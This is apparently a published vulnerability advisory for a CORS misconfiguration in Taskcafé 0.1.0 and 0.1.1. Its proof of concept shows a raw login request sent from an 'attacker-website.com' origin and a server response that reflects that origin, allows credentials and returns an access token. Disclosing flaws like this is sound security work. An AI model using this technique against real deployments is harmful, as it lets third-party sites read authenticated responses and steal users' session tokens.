#Exploit Title: Taskcafé 0.1.0 and 0.1.1- Cross-Origin Resource Sharing
#Date: 2020- 09- 02
#Exploit Author: Mufaddal Masalawala
#Vendor Homepage: https://github.com/JordanKnott/
#Software Link: https://github.com/JordanKnott/taskcafe
#Version: 0.1.0 and 0.1.1
#Tested on: Kali Linux 2020.3
#POC:
The web application fails to properly validate the Origin header
and returns the header Access-Control-Allow-Credentials: true. In this
configuration any website can issue requests made with user credentials and
read the responses to these requests. Trusting arbitrary origins
effectively disables the same-origin policy, allowing two-way interaction
by third-party web sites.
#REQUEST:
POST /auth/login HTTP/1.1
Host: 10.20.175.152:3333
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0)
Gecko/20100101 Firefox/80.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.20.175.152:3333/login
Content-Type: text/plain;charset=UTF-8
Origin: http://attacker-website.com
Content-Length: 43
Connection: close
Cookie: refreshToken=c00f94f3-c151-4e13-8084-ea160d94e584
{"username":"XXXX","password":"XXXXXX"}
#RESPONSE:
HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: http://attacker-website.com
Access-Control-Expose-Headers: Link
Content-Type: application/json
Set-Cookie: refreshToken=9048c8fd-0f7c-4c9d-9e88-2cd9f7a25d61; Expires=Thu,
03 Sep 2020 04:22:10 GMT; HttpOnly
Vary: Origin
Date: Wed, 02 Sep 2020 04:22:10 GMT
Content-Length: 271
Connection: close
{"accessToken":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiI4YmRhMmY5ZS1iM2E3LTRmNzgtOTQ2Ny05YWZmNGM0OGFkZTAiLCJyZXN0cmljdGVkIjoidW5yZXN0cmljdGVkIiwib3JnUm9sZSI6Im1lbWJlciIsImV4cCI6MTU5OTAyMDUzNX0.eDYvNvXRf6CKULCOrMLAtKnUek9Y8IP9YnVXRAR74gE","isInstalled":false}